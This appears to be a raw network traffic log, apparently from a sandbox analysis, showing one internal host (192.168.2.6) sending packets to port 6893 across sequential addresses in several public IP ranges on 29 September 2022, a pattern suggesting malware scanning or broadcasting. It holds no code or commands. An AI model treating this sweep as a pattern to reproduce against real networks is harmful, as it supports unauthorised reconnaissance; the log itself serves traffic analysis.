Sep 29, 2022 14:50:27.999511003 CEST	59083	6893	192.168.2.6	87.98.179.210
Sep 29, 2022 14:50:27.999618053 CEST	59083	6893	192.168.2.6	87.98.179.211
Sep 29, 2022 14:50:27.999749899 CEST	59083	6893	192.168.2.6	87.98.179.212
Sep 29, 2022 14:50:27.999934912 CEST	59083	6893	192.168.2.6	87.98.179.213
Sep 29, 2022 14:50:28.000051022 CEST	59083	6893	192.168.2.6	87.98.179.214
Sep 29, 2022 14:50:28.000138044 CEST	59083	6893	192.168.2.6	87.98.179.215
Sep 29, 2022 14:50:28.000241041 CEST	59083	6893	192.168.2.6	87.98.179.216
Sep 29, 2022 14:50:28.000343084 CEST	59083	6893	192.168.2.6	87.98.179.217
Sep 29, 2022 14:50:28.000452042 CEST	59083	6893	192.168.2.6	87.98.179.218
Sep 29, 2022 14:50:28.000598907 CEST	59083	6893	192.168.2.6	87.98.179.219
Sep 29, 2022 14:50:28.000732899 CEST	59083	6893	192.168.2.6	87.98.179.220
Sep 29, 2022 14:50:28.000833988 CEST	59083	6893	192.168.2.6	87.98.179.221
Sep 29, 2022 14:50:28.000979900 CEST	59083	6893	192.168.2.6	87.98.179.222
Sep 29, 2022 14:50:28.001091003 CEST	59083	6893	192.168.2.6	87.98.179.223
Sep 29, 2022 14:50:28.001239061 CEST	59083	6893	192.168.2.6	87.98.179.224
Sep 29, 2022 14:50:28.001337051 CEST	59083	6893	192.168.2.6	87.98.179.225
Sep 29, 2022 14:50:28.001538038 CEST	59083	6893	192.168.2.6	87.98.179.227
Sep 29, 2022 14:50:28.001569033 CEST	59083	6893	192.168.2.6	87.98.179.226
Sep 29, 2022 14:50:28.001652956 CEST	59083	6893	192.168.2.6	87.98.179.228
Sep 29, 2022 14:50:28.001863956 CEST	59083	6893	192.168.2.6	87.98.179.229
Sep 29, 2022 14:50:28.001869917 CEST	59083	6893	192.168.2.6	87.98.179.230
Sep 29, 2022 14:50:28.001992941 CEST	59083	6893	192.168.2.6	87.98.179.231
Sep 29, 2022 14:50:28.002135992 CEST	59083	6893	192.168.2.6	87.98.179.232
Sep 29, 2022 14:50:28.002255917 CEST	59083	6893	192.168.2.6	87.98.179.233
Sep 29, 2022 14:50:28.002351999 CEST	59083	6893	192.168.2.6	87.98.179.234
Sep 29, 2022 14:50:28.002546072 CEST	59083	6893	192.168.2.6	87.98.179.235
Sep 29, 2022 14:50:28.002619028 CEST	59083	6893	192.168.2.6	87.98.179.236
Sep 29, 2022 14:50:28.002737999 CEST	59083	6893	192.168.2.6	87.98.179.237
Sep 29, 2022 14:50:28.002840996 CEST	59083	6893	192.168.2.6	87.98.179.238
Sep 29, 2022 14:50:28.003021002 CEST	59083	6893	192.168.2.6	87.98.179.239
Sep 29, 2022 14:50:28.003124952 CEST	59083	6893	192.168.2.6	87.98.179.240
Sep 29, 2022 14:50:28.004859924 CEST	59083	6893	192.168.2.6	87.98.179.241
Sep 29, 2022 14:50:28.005045891 CEST	59083	6893	192.168.2.6	87.98.179.242
Sep 29, 2022 14:50:28.005175114 CEST	59083	6893	192.168.2.6	87.98.179.243
Sep 29, 2022 14:50:28.005248070 CEST	59083	6893	192.168.2.6	87.98.179.244
Sep 29, 2022 14:50:28.005369902 CEST	59083	6893	192.168.2.6	87.98.179.245
Sep 29, 2022 14:50:28.005484104 CEST	59083	6893	192.168.2.6	87.98.179.246
Sep 29, 2022 14:50:28.005563974 CEST	59083	6893	192.168.2.6	87.98.179.247
Sep 29, 2022 14:50:28.005641937 CEST	59083	6893	192.168.2.6	87.98.179.248
Sep 29, 2022 14:50:28.005737066 CEST	59083	6893	192.168.2.6	87.98.179.249
Sep 29, 2022 14:50:28.005806923 CEST	59083	6893	192.168.2.6	87.98.179.250
Sep 29, 2022 14:50:28.005881071 CEST	59083	6893	192.168.2.6	87.98.179.251
Sep 29, 2022 14:50:28.005964994 CEST	59083	6893	192.168.2.6	87.98.179.252
Sep 29, 2022 14:50:28.006089926 CEST	59083	6893	192.168.2.6	87.98.179.253
Sep 29, 2022 14:50:28.007112026 CEST	59083	6893	192.168.2.6	87.98.179.254
Sep 29, 2022 14:50:29.057388067 CEST	59083	6893	192.168.2.6	87.98.179.255
Sep 29, 2022 14:50:33.439837933 CEST	59084	6893	192.168.2.6	93.107.12.0
Sep 29, 2022 14:50:33.439920902 CEST	59084	6893	192.168.2.6	93.107.12.2
Sep 29, 2022 14:50:33.439918995 CEST	59084	6893	192.168.2.6	93.107.12.1
Sep 29, 2022 14:50:33.440087080 CEST	59084	6893	192.168.2.6	93.107.12.3
Sep 29, 2022 14:50:33.440145016 CEST	59084	6893	192.168.2.6	93.107.12.4
Sep 29, 2022 14:50:33.440242052 CEST	59084	6893	192.168.2.6	93.107.12.5
Sep 29, 2022 14:50:33.440287113 CEST	59084	6893	192.168.2.6	93.107.12.6
Sep 29, 2022 14:50:33.440367937 CEST	59084	6893	192.168.2.6	93.107.12.7
Sep 29, 2022 14:50:33.440432072 CEST	59084	6893	192.168.2.6	93.107.12.8
Sep 29, 2022 14:50:33.440498114 CEST	59084	6893	192.168.2.6	93.107.12.9
Sep 29, 2022 14:50:33.440583944 CEST	59084	6893	192.168.2.6	93.107.12.10
Sep 29, 2022 14:50:33.440639973 CEST	59084	6893	192.168.2.6	93.107.12.11
Sep 29, 2022 14:50:33.440723896 CEST	59084	6893	192.168.2.6	93.107.12.12
Sep 29, 2022 14:50:33.440787077 CEST	59084	6893	192.168.2.6	93.107.12.13
Sep 29, 2022 14:50:33.440866947 CEST	59084	6893	192.168.2.6	93.107.12.14
Sep 29, 2022 14:50:33.440948009 CEST	59084	6893	192.168.2.6	93.107.12.15
Sep 29, 2022 14:50:33.441005945 CEST	59084	6893	192.168.2.6	93.107.12.16
Sep 29, 2022 14:50:33.441070080 CEST	59084	6893	192.168.2.6	93.107.12.17
Sep 29, 2022 14:50:33.441143990 CEST	59084	6893	192.168.2.6	93.107.12.18
Sep 29, 2022 14:50:33.441301107 CEST	59084	6893	192.168.2.6	93.107.12.20
Sep 29, 2022 14:50:33.441354036 CEST	59084	6893	192.168.2.6	93.107.12.21
Sep 29, 2022 14:50:33.441379070 CEST	59084	6893	192.168.2.6	93.107.12.19
Sep 29, 2022 14:50:33.441433907 CEST	59084	6893	192.168.2.6	93.107.12.22
Sep 29, 2022 14:50:33.441503048 CEST	59084	6893	192.168.2.6	93.107.12.23
Sep 29, 2022 14:50:33.441596985 CEST	59084	6893	192.168.2.6	93.107.12.24
Sep 29, 2022 14:50:33.444206953 CEST	59084	6893	192.168.2.6	93.107.12.25
Sep 29, 2022 14:50:33.444319010 CEST	59084	6893	192.168.2.6	93.107.12.26
Sep 29, 2022 14:50:33.444407940 CEST	59084	6893	192.168.2.6	93.107.12.27
Sep 29, 2022 14:50:33.444505930 CEST	59084	6893	192.168.2.6	93.107.12.28
Sep 29, 2022 14:50:33.444552898 CEST	59084	6893	192.168.2.6	93.107.12.29
Sep 29, 2022 14:50:33.445668936 CEST	59084	6893	192.168.2.6	93.107.12.30
Sep 29, 2022 14:50:33.445868015 CEST	59084	6893	192.168.2.6	93.107.12.31
Sep 29, 2022 14:50:33.446104050 CEST	59084	6893	192.168.2.6	95.1.200.0
Sep 29, 2022 14:50:33.446194887 CEST	59084	6893	192.168.2.6	95.1.200.1
Sep 29, 2022 14:50:33.453953028 CEST	59084	6893	192.168.2.6	95.1.200.2
Sep 29, 2022 14:50:33.454045057 CEST	59084	6893	192.168.2.6	95.1.200.3
Sep 29, 2022 14:50:33.454128027 CEST	59084	6893	192.168.2.6	95.1.200.4
Sep 29, 2022 14:50:33.454246044 CEST	59084	6893	192.168.2.6	95.1.200.5
Sep 29, 2022 14:50:33.454364061 CEST	59084	6893	192.168.2.6	95.1.200.6
Sep 29, 2022 14:50:33.454447031 CEST	59084	6893	192.168.2.6	95.1.200.7
Sep 29, 2022 14:50:33.454502106 CEST	59084	6893	192.168.2.6	95.1.200.8
Sep 29, 2022 14:50:33.454637051 CEST	59084	6893	192.168.2.6	95.1.200.9
Sep 29, 2022 14:50:33.454672098 CEST	59084	6893	192.168.2.6	95.1.200.10
Sep 29, 2022 14:50:33.454783916 CEST	59084	6893	192.168.2.6	95.1.200.11
Sep 29, 2022 14:50:33.454910040 CEST	59084	6893	192.168.2.6	95.1.200.12
Sep 29, 2022 14:50:33.454987049 CEST	59084	6893	192.168.2.6	95.1.200.13
Sep 29, 2022 14:50:33.455069065 CEST	59084	6893	192.168.2.6	95.1.200.14
Sep 29, 2022 14:50:33.455127954 CEST	59084	6893	192.168.2.6	95.1.200.15
Sep 29, 2022 14:50:33.455210924 CEST	59084	6893	192.168.2.6	95.1.200.16
Sep 29, 2022 14:50:33.455398083 CEST	59084	6893	192.168.2.6	95.1.200.17
Sep 29, 2022 14:50:33.455488920 CEST	59084	6893	192.168.2.6	95.1.200.18
Sep 29, 2022 14:50:33.455565929 CEST	59084	6893	192.168.2.6	95.1.200.19
Sep 29, 2022 14:50:33.455637932 CEST	59084	6893	192.168.2.6	95.1.200.20
Sep 29, 2022 14:50:33.455847025 CEST	59084	6893	192.168.2.6	95.1.200.22
Sep 29, 2022 14:50:33.455961943 CEST	59084	6893	192.168.2.6	95.1.200.21
Sep 29, 2022 14:50:33.455970049 CEST	59084	6893	192.168.2.6	95.1.200.23
Sep 29, 2022 14:50:33.456100941 CEST	59084	6893	192.168.2.6	95.1.200.25
Sep 29, 2022 14:50:33.456171989 CEST	59084	6893	192.168.2.6	95.1.200.26
Sep 29, 2022 14:50:33.456263065 CEST	59084	6893	192.168.2.6	95.1.200.27
Sep 29, 2022 14:50:33.456342936 CEST	59084	6893	192.168.2.6	95.1.200.28
Sep 29, 2022 14:50:33.456410885 CEST	59084	6893	192.168.2.6	95.1.200.29
Sep 29, 2022 14:50:33.456474066 CEST	59084	6893	192.168.2.6	95.1.200.30
Sep 29, 2022 14:50:33.456552029 CEST	59084	6893	192.168.2.6	95.1.200.31
Sep 29, 2022 14:50:33.456559896 CEST	59084	6893	192.168.2.6	95.1.200.24
Sep 29, 2022 14:50:33.456741095 CEST	59084	6893	192.168.2.6	87.98.176.0
Sep 29, 2022 14:50:33.456835985 CEST	59084	6893	192.168.2.6	87.98.176.1
Sep 29, 2022 14:50:33.456931114 CEST	59084	6893	192.168.2.6	87.98.176.2
Sep 29, 2022 14:50:33.457015991 CEST	59084	6893	192.168.2.6	87.98.176.3
Sep 29, 2022 14:50:33.457078934 CEST	59084	6893	192.168.2.6	87.98.176.4
Sep 29, 2022 14:50:33.457194090 CEST	59084	6893	192.168.2.6	87.98.176.5
Sep 29, 2022 14:50:33.458551884 CEST	59084	6893	192.168.2.6	87.98.176.6
Sep 29, 2022 14:50:33.458661079 CEST	59084	6893	192.168.2.6	87.98.176.7
Sep 29, 2022 14:50:33.458715916 CEST	59084	6893	192.168.2.6	87.98.176.8
Sep 29, 2022 14:50:33.458792925 CEST	59084	6893	192.168.2.6	87.98.176.9
Sep 29, 2022 14:50:33.458906889 CEST	59084	6893	192.168.2.6	87.98.176.10
Sep 29, 2022 14:50:33.458920956 CEST	59084	6893	192.168.2.6	87.98.176.11
Sep 29, 2022 14:50:33.458980083 CEST	59084	6893	192.168.2.6	87.98.176.12
Sep 29, 2022 14:50:33.459057093 CEST	59084	6893	192.168.2.6	87.98.176.13
Sep 29, 2022 14:50:33.459172010 CEST	59084	6893	192.168.2.6	87.98.176.14
Sep 29, 2022 14:50:33.459256887 CEST	59084	6893	192.168.2.6	87.98.176.15
Sep 29, 2022 14:50:33.459301949 CEST	59084	6893	192.168.2.6	87.98.176.16
Sep 29, 2022 14:50:33.459386110 CEST	59084	6893	192.168.2.6	87.98.176.17
Sep 29, 2022 14:50:33.459449053 CEST	59084	6893	192.168.2.6	87.98.176.18
Sep 29, 2022 14:50:33.459547043 CEST	59084	6893	192.168.2.6	87.98.176.19
Sep 29, 2022 14:50:33.459644079 CEST	59084	6893	192.168.2.6	87.98.176.20
Sep 29, 2022 14:50:33.459703922 CEST	59084	6893	192.168.2.6	87.98.176.21
Sep 29, 2022 14:50:33.459784031 CEST	59084	6893	192.168.2.6	87.98.176.22
Sep 29, 2022 14:50:33.459865093 CEST	59084	6893	192.168.2.6	87.98.176.23
Sep 29, 2022 14:50:33.459902048 CEST	59084	6893	192.168.2.6	87.98.176.24
Sep 29, 2022 14:50:33.459969044 CEST	59084	6893	192.168.2.6	87.98.176.25
Sep 29, 2022 14:50:33.460037947 CEST	59084	6893	192.168.2.6	87.98.176.26
Sep 29, 2022 14:50:33.460191011 CEST	59084	6893	192.168.2.6	87.98.176.27
Sep 29, 2022 14:50:33.460191965 CEST	59084	6893	192.168.2.6	87.98.176.28
Sep 29, 2022 14:50:33.460232973 CEST	59084	6893	192.168.2.6	87.98.176.29
Sep 29, 2022 14:50:33.460319996 CEST	59084	6893	192.168.2.6	87.98.176.30
Sep 29, 2022 14:50:33.480748892 CEST	59084	6893	192.168.2.6	87.98.176.31
Sep 29, 2022 14:50:33.480854034 CEST	59084	6893	192.168.2.6	87.98.176.32
Sep 29, 2022 14:50:33.480930090 CEST	59084	6893	192.168.2.6	87.98.176.33
Sep 29, 2022 14:50:33.481040001 CEST	59084	6893	192.168.2.6	87.98.176.34
Sep 29, 2022 14:50:33.481235981 CEST	59084	6893	192.168.2.6	87.98.176.35
Sep 29, 2022 14:50:33.481239080 CEST	59084	6893	192.168.2.6	87.98.176.36
Sep 29, 2022 14:50:33.481290102 CEST	59084	6893	192.168.2.6	87.98.176.37
Sep 29, 2022 14:50:33.481432915 CEST	59084	6893	192.168.2.6	87.98.176.38
Sep 29, 2022 14:50:33.481667995 CEST	59084	6893	192.168.2.6	87.98.176.39
Sep 29, 2022 14:50:33.481667995 CEST	59084	6893	192.168.2.6	87.98.176.40
Sep 29, 2022 14:50:33.481791019 CEST	59084	6893	192.168.2.6	87.98.176.41
Sep 29, 2022 14:50:33.481890917 CEST	59084	6893	192.168.2.6	87.98.176.42
Sep 29, 2022 14:50:33.481942892 CEST	59084	6893	192.168.2.6	87.98.176.43
Sep 29, 2022 14:50:33.482007980 CEST	59084	6893	192.168.2.6	87.98.176.44
Sep 29, 2022 14:50:33.482100964 CEST	59084	6893	192.168.2.6	87.98.176.45
Sep 29, 2022 14:50:33.482165098 CEST	59084	6893	192.168.2.6	87.98.176.46
Sep 29, 2022 14:50:33.482239962 CEST	59084	6893	192.168.2.6	87.98.176.47
Sep 29, 2022 14:50:33.482311010 CEST	59084	6893	192.168.2.6	87.98.176.48
Sep 29, 2022 14:50:33.482475042 CEST	59084	6893	192.168.2.6	87.98.176.49
Sep 29, 2022 14:50:33.482553005 CEST	59084	6893	192.168.2.6	87.98.176.50
Sep 29, 2022 14:50:33.482628107 CEST	59084	6893	192.168.2.6	87.98.176.51
Sep 29, 2022 14:50:33.482861996 CEST	59084	6893	192.168.2.6	87.98.176.53
Sep 29, 2022 14:50:33.482862949 CEST	59084	6893	192.168.2.6	87.98.176.52
Sep 29, 2022 14:50:33.482934952 CEST	59084	6893	192.168.2.6	87.98.176.54
Sep 29, 2022 14:50:33.483019114 CEST	59084	6893	192.168.2.6	87.98.176.55
Sep 29, 2022 14:50:33.483077049 CEST	59084	6893	192.168.2.6	87.98.176.56
Sep 29, 2022 14:50:33.483200073 CEST	59084	6893	192.168.2.6	87.98.176.57
Sep 29, 2022 14:50:33.483227015 CEST	59084	6893	192.168.2.6	87.98.176.58
Sep 29, 2022 14:50:33.483444929 CEST	59084	6893	192.168.2.6	87.98.176.60
Sep 29, 2022 14:50:33.483469963 CEST	59084	6893	192.168.2.6	87.98.176.59
Sep 29, 2022 14:50:33.483525991 CEST	59084	6893	192.168.2.6	87.98.176.61
Sep 29, 2022 14:50:33.483679056 CEST	59084	6893	192.168.2.6	87.98.176.62
Sep 29, 2022 14:50:33.483803034 CEST	59084	6893	192.168.2.6	87.98.176.63
Sep 29, 2022 14:50:33.483829975 CEST	59084	6893	192.168.2.6	87.98.176.64
Sep 29, 2022 14:50:33.483972073 CEST	59084	6893	192.168.2.6	87.98.176.66
Sep 29, 2022 14:50:33.483977079 CEST	59084	6893	192.168.2.6	87.98.176.65
Sep 29, 2022 14:50:33.484035015 CEST	59084	6893	192.168.2.6	87.98.176.67
Sep 29, 2022 14:50:33.484112024 CEST	59084	6893	192.168.2.6	87.98.176.68
Sep 29, 2022 14:50:33.484301090 CEST	59084	6893	192.168.2.6	87.98.176.70
Sep 29, 2022 14:50:33.484380960 CEST	59084	6893	192.168.2.6	87.98.176.71
Sep 29, 2022 14:50:33.484380960 CEST	59084	6893	192.168.2.6	87.98.176.72
Sep 29, 2022 14:50:33.484400034 CEST	59084	6893	192.168.2.6	87.98.176.69
Sep 29, 2022 14:50:33.484425068 CEST	59084	6893	192.168.2.6	87.98.176.73
Sep 29, 2022 14:50:33.484553099 CEST	59084	6893	192.168.2.6	87.98.176.75
Sep 29, 2022 14:50:33.484613895 CEST	59084	6893	192.168.2.6	87.98.176.76
Sep 29, 2022 14:50:33.484677076 CEST	59084	6893	192.168.2.6	87.98.176.77
Sep 29, 2022 14:50:33.484736919 CEST	59084	6893	192.168.2.6	87.98.176.78
Sep 29, 2022 14:50:33.484806061 CEST	59084	6893	192.168.2.6	87.98.176.79
Sep 29, 2022 14:50:33.484863043 CEST	59084	6893	192.168.2.6	87.98.176.80
Sep 29, 2022 14:50:33.484941006 CEST	59084	6893	192.168.2.6	87.98.176.81
Sep 29, 2022 14:50:33.484978914 CEST	59084	6893	192.168.2.6	87.98.176.74
Sep 29, 2022 14:50:33.485022068 CEST	59084	6893	192.168.2.6	87.98.176.82
Sep 29, 2022 14:50:33.485105991 CEST	59084	6893	192.168.2.6	87.98.176.83
Sep 29, 2022 14:50:33.485184908 CEST	59084	6893	192.168.2.6	87.98.176.84
Sep 29, 2022 14:50:33.485249043 CEST	59084	6893	192.168.2.6	87.98.176.85
Sep 29, 2022 14:50:33.485321999 CEST	59084	6893	192.168.2.6	87.98.176.86
Sep 29, 2022 14:50:33.485543013 CEST	59084	6893	192.168.2.6	87.98.176.87
Sep 29, 2022 14:50:33.485543013 CEST	59084	6893	192.168.2.6	87.98.176.88
Sep 29, 2022 14:50:33.485613108 CEST	59084	6893	192.168.2.6	87.98.176.89
Sep 29, 2022 14:50:33.485692978 CEST	59084	6893	192.168.2.6	87.98.176.90
Sep 29, 2022 14:50:33.485841036 CEST	59084	6893	192.168.2.6	87.98.176.91
Sep 29, 2022 14:50:33.485939980 CEST	59084	6893	192.168.2.6	87.98.176.92
Sep 29, 2022 14:50:33.486074924 CEST	59084	6893	192.168.2.6	87.98.176.93
Sep 29, 2022 14:50:33.486167908 CEST	59084	6893	192.168.2.6	87.98.176.94
Sep 29, 2022 14:50:33.486238003 CEST	59084	6893	192.168.2.6	87.98.176.95
Sep 29, 2022 14:50:33.486429930 CEST	59084	6893	192.168.2.6	87.98.176.96
Sep 29, 2022 14:50:33.486557961 CEST	59084	6893	192.168.2.6	87.98.176.97
Sep 29, 2022 14:50:33.486692905 CEST	59084	6893	192.168.2.6	87.98.176.98
Sep 29, 2022 14:50:33.486774921 CEST	59084	6893	192.168.2.6	87.98.176.99
Sep 29, 2022 14:50:33.486852884 CEST	59084	6893	192.168.2.6	87.98.176.100
Sep 29, 2022 14:50:33.487135887 CEST	59084	6893	192.168.2.6	87.98.176.102
Sep 29, 2022 14:50:33.487212896 CEST	59084	6893	192.168.2.6	87.98.176.103
Sep 29, 2022 14:50:33.487222910 CEST	59084	6893	192.168.2.6	87.98.176.101
Sep 29, 2022 14:50:33.487338066 CEST	59084	6893	192.168.2.6	87.98.176.104
Sep 29, 2022 14:50:33.487462997 CEST	59084	6893	192.168.2.6	87.98.176.105
Sep 29, 2022 14:50:33.487545013 CEST	59084	6893	192.168.2.6	87.98.176.106
Sep 29, 2022 14:50:33.487641096 CEST	59084	6893	192.168.2.6	87.98.176.107
Sep 29, 2022 14:50:33.487776041 CEST	59084	6893	192.168.2.6	87.98.176.108
Sep 29, 2022 14:50:33.487880945 CEST	59084	6893	192.168.2.6	87.98.176.109
Sep 29, 2022 14:50:33.487967014 CEST	59084	6893	192.168.2.6	87.98.176.110
Sep 29, 2022 14:50:33.488078117 CEST	59084	6893	192.168.2.6	87.98.176.111
Sep 29, 2022 14:50:33.488179922 CEST	59084	6893	192.168.2.6	87.98.176.112
Sep 29, 2022 14:50:33.488275051 CEST	59084	6893	192.168.2.6	87.98.176.113
Sep 29, 2022 14:50:33.495289087 CEST	59084	6893	192.168.2.6	87.98.176.114
Sep 29, 2022 14:50:33.495510101 CEST	59084	6893	192.168.2.6	87.98.176.115
Sep 29, 2022 14:50:33.495609999 CEST	59084	6893	192.168.2.6	87.98.176.116
Sep 29, 2022 14:50:33.495790958 CEST	59084	6893	192.168.2.6	87.98.176.117
Sep 29, 2022 14:50:33.495891094 CEST	59084	6893	192.168.2.6	87.98.176.118
Sep 29, 2022 14:50:33.496021032 CEST	59084	6893	192.168.2.6	87.98.176.119
Sep 29, 2022 14:50:33.496089935 CEST	59084	6893	192.168.2.6	87.98.176.120
Sep 29, 2022 14:50:33.496232986 CEST	59084	6893	192.168.2.6	87.98.176.121
Sep 29, 2022 14:50:33.496365070 CEST	59084	6893	192.168.2.6	87.98.176.122
Sep 29, 2022 14:50:33.496607065 CEST	59084	6893	192.168.2.6	87.98.176.123
Sep 29, 2022 14:50:33.496642113 CEST	59084	6893	192.168.2.6	87.98.176.124
Sep 29, 2022 14:50:33.496728897 CEST	59084	6893	192.168.2.6	87.98.176.125
Sep 29, 2022 14:50:33.496835947 CEST	59084	6893	192.168.2.6	87.98.176.126
Sep 29, 2022 14:50:33.496938944 CEST	59084	6893	192.168.2.6	87.98.176.127
Sep 29, 2022 14:50:33.497019053 CEST	59084	6893	192.168.2.6	87.98.176.128
Sep 29, 2022 14:50:33.497123003 CEST	59084	6893	192.168.2.6	87.98.176.129
Sep 29, 2022 14:50:33.497246981 CEST	59084	6893	192.168.2.6	87.98.176.130
Sep 29, 2022 14:50:33.497330904 CEST	59084	6893	192.168.2.6	87.98.176.131
Sep 29, 2022 14:50:33.497457981 CEST	59084	6893	192.168.2.6	87.98.176.132
Sep 29, 2022 14:50:33.497622013 CEST	59084	6893	192.168.2.6	87.98.176.133
Sep 29, 2022 14:50:33.497703075 CEST	59084	6893	192.168.2.6	87.98.176.134
Sep 29, 2022 14:50:33.497792959 CEST	59084	6893	192.168.2.6	87.98.176.135
Sep 29, 2022 14:50:33.497986078 CEST	59084	6893	192.168.2.6	87.98.176.137
Sep 29, 2022 14:50:33.498071909 CEST	59084	6893	192.168.2.6	87.98.176.138
Sep 29, 2022 14:50:33.498171091 CEST	59084	6893	192.168.2.6	87.98.176.136
Sep 29, 2022 14:50:33.498172998 CEST	59084	6893	192.168.2.6	87.98.176.139
Sep 29, 2022 14:50:33.498277903 CEST	59084	6893	192.168.2.6	87.98.176.140
Sep 29, 2022 14:50:33.498439074 CEST	59084	6893	192.168.2.6	87.98.176.141
Sep 29, 2022 14:50:33.498553991 CEST	59084	6893	192.168.2.6	87.98.176.142
Sep 29, 2022 14:50:33.572887897 CEST	59084	6893	192.168.2.6	87.98.176.143
Sep 29, 2022 14:50:33.573008060 CEST	59084	6893	192.168.2.6	87.98.176.144
Sep 29, 2022 14:50:33.573123932 CEST	59084	6893	192.168.2.6	87.98.176.145
Sep 29, 2022 14:50:33.573292971 CEST	59084	6893	192.168.2.6	87.98.176.146
Sep 29, 2022 14:50:33.573427916 CEST	59084	6893	192.168.2.6	87.98.176.147
Sep 29, 2022 14:50:33.573559999 CEST	59084	6893	192.168.2.6	87.98.176.148
Sep 29, 2022 14:50:33.573663950 CEST	59084	6893	192.168.2.6	87.98.176.149
Sep 29, 2022 14:50:33.573812962 CEST	59084	6893	192.168.2.6	87.98.176.150
Sep 29, 2022 14:50:33.573879004 CEST	59084	6893	192.168.2.6	87.98.176.151
Sep 29, 2022 14:50:33.573981047 CEST	59084	6893	192.168.2.6	87.98.176.152
Sep 29, 2022 14:50:33.574112892 CEST	59084	6893	192.168.2.6	87.98.176.153
Sep 29, 2022 14:50:33.574331999 CEST	59084	6893	192.168.2.6	87.98.176.155
Sep 29, 2022 14:50:33.574373007 CEST	59084	6893	192.168.2.6	87.98.176.154
Sep 29, 2022 14:50:33.574462891 CEST	59084	6893	192.168.2.6	87.98.176.156
Sep 29, 2022 14:50:33.574584007 CEST	59084	6893	192.168.2.6	87.98.176.157
Sep 29, 2022 14:50:33.574666977 CEST	59084	6893	192.168.2.6	87.98.176.158
Sep 29, 2022 14:50:33.574758053 CEST	59084	6893	192.168.2.6	87.98.176.159
Sep 29, 2022 14:50:33.574850082 CEST	59084	6893	192.168.2.6	87.98.176.160
Sep 29, 2022 14:50:33.574965954 CEST	59084	6893	192.168.2.6	87.98.176.161
Sep 29, 2022 14:50:33.575067997 CEST	59084	6893	192.168.2.6	87.98.176.162
Sep 29, 2022 14:50:33.575186014 CEST	59084	6893	192.168.2.6	87.98.176.163
Sep 29, 2022 14:50:33.575433016 CEST	59084	6893	192.168.2.6	87.98.176.165
Sep 29, 2022 14:50:33.575433016 CEST	59084	6893	192.168.2.6	87.98.176.164
Sep 29, 2022 14:50:33.575548887 CEST	59084	6893	192.168.2.6	87.98.176.166
Sep 29, 2022 14:50:33.575644970 CEST	59084	6893	192.168.2.6	87.98.176.167
Sep 29, 2022 14:50:33.575715065 CEST	59084	6893	192.168.2.6	87.98.176.168
Sep 29, 2022 14:50:33.575838089 CEST	59084	6893	192.168.2.6	87.98.176.169
Sep 29, 2022 14:50:33.575916052 CEST	59084	6893	192.168.2.6	87.98.176.170
Sep 29, 2022 14:50:33.576025963 CEST	59084	6893	192.168.2.6	87.98.176.171
Sep 29, 2022 14:50:33.576118946 CEST	59084	6893	192.168.2.6	87.98.176.172
Sep 29, 2022 14:50:33.576201916 CEST	59084	6893	192.168.2.6	87.98.176.173
Sep 29, 2022 14:50:33.576407909 CEST	59084	6893	192.168.2.6	87.98.176.174
Sep 29, 2022 14:50:33.576524019 CEST	59084	6893	192.168.2.6	87.98.176.175
Sep 29, 2022 14:50:33.576658010 CEST	59084	6893	192.168.2.6	87.98.176.176
Sep 29, 2022 14:50:33.576723099 CEST	59084	6893	192.168.2.6	87.98.176.177
Sep 29, 2022 14:50:33.576858044 CEST	59084	6893	192.168.2.6	87.98.176.178
Sep 29, 2022 14:50:33.576947927 CEST	59084	6893	192.168.2.6	87.98.176.179
Sep 29, 2022 14:50:33.577076912 CEST	59084	6893	192.168.2.6	87.98.176.180
Sep 29, 2022 14:50:33.577174902 CEST	59084	6893	192.168.2.6	87.98.176.181
Sep 29, 2022 14:50:33.577233076 CEST	59084	6893	192.168.2.6	87.98.176.182
Sep 29, 2022 14:50:33.577353001 CEST	59084	6893	192.168.2.6	87.98.176.183
Sep 29, 2022 14:50:33.577466011 CEST	59084	6893	192.168.2.6	87.98.176.184
Sep 29, 2022 14:50:33.577606916 CEST	59084	6893	192.168.2.6	87.98.176.185
Sep 29, 2022 14:50:33.577752113 CEST	59084	6893	192.168.2.6	87.98.176.186
Sep 29, 2022 14:50:33.577828884 CEST	59084	6893	192.168.2.6	87.98.176.187
Sep 29, 2022 14:50:33.577939034 CEST	59084	6893	192.168.2.6	87.98.176.188
Sep 29, 2022 14:50:33.578036070 CEST	59084	6893	192.168.2.6	87.98.176.189
Sep 29, 2022 14:50:33.578150988 CEST	59084	6893	192.168.2.6	87.98.176.190
Sep 29, 2022 14:50:33.578273058 CEST	59084	6893	192.168.2.6	87.98.176.191
Sep 29, 2022 14:50:33.578356028 CEST	59084	6893	192.168.2.6	87.98.176.192
Sep 29, 2022 14:50:33.578459024 CEST	59084	6893	192.168.2.6	87.98.176.193
Sep 29, 2022 14:50:33.578573942 CEST	59084	6893	192.168.2.6	87.98.176.194
Sep 29, 2022 14:50:33.578749895 CEST	59084	6893	192.168.2.6	87.98.176.195
Sep 29, 2022 14:50:33.578895092 CEST	59084	6893	192.168.2.6	87.98.176.196
Sep 29, 2022 14:50:33.579047918 CEST	59084	6893	192.168.2.6	87.98.176.197
Sep 29, 2022 14:50:33.579195023 CEST	59084	6893	192.168.2.6	87.98.176.198
Sep 29, 2022 14:50:33.579329014 CEST	59084	6893	192.168.2.6	87.98.176.199
Sep 29, 2022 14:50:33.579421043 CEST	59084	6893	192.168.2.6	87.98.176.200
Sep 29, 2022 14:50:33.579533100 CEST	59084	6893	192.168.2.6	87.98.176.201
Sep 29, 2022 14:50:33.579657078 CEST	59084	6893	192.168.2.6	87.98.176.202
Sep 29, 2022 14:50:33.579762936 CEST	59084	6893	192.168.2.6	87.98.176.203
Sep 29, 2022 14:50:33.579868078 CEST	59084	6893	192.168.2.6	87.98.176.204
Sep 29, 2022 14:50:33.579981089 CEST	59084	6893	192.168.2.6	87.98.176.205
Sep 29, 2022 14:50:33.580108881 CEST	59084	6893	192.168.2.6	87.98.176.206
Sep 29, 2022 14:50:33.580327034 CEST	59084	6893	192.168.2.6	87.98.176.207
Sep 29, 2022 14:50:33.580372095 CEST	59084	6893	192.168.2.6	87.98.176.208
Sep 29, 2022 14:50:33.580540895 CEST	59084	6893	192.168.2.6	87.98.176.209
Sep 29, 2022 14:50:33.580688000 CEST	59084	6893	192.168.2.6	87.98.176.210
Sep 29, 2022 14:50:33.580813885 CEST	59084	6893	192.168.2.6	87.98.176.211
Sep 29, 2022 14:50:33.580955029 CEST	59084	6893	192.168.2.6	87.98.176.212
Sep 29, 2022 14:50:33.581089973 CEST	59084	6893	192.168.2.6	87.98.176.213
Sep 29, 2022 14:50:33.581217051 CEST	59084	6893	192.168.2.6	87.98.176.214
Sep 29, 2022 14:50:33.581337929 CEST	59084	6893	192.168.2.6	87.98.176.215
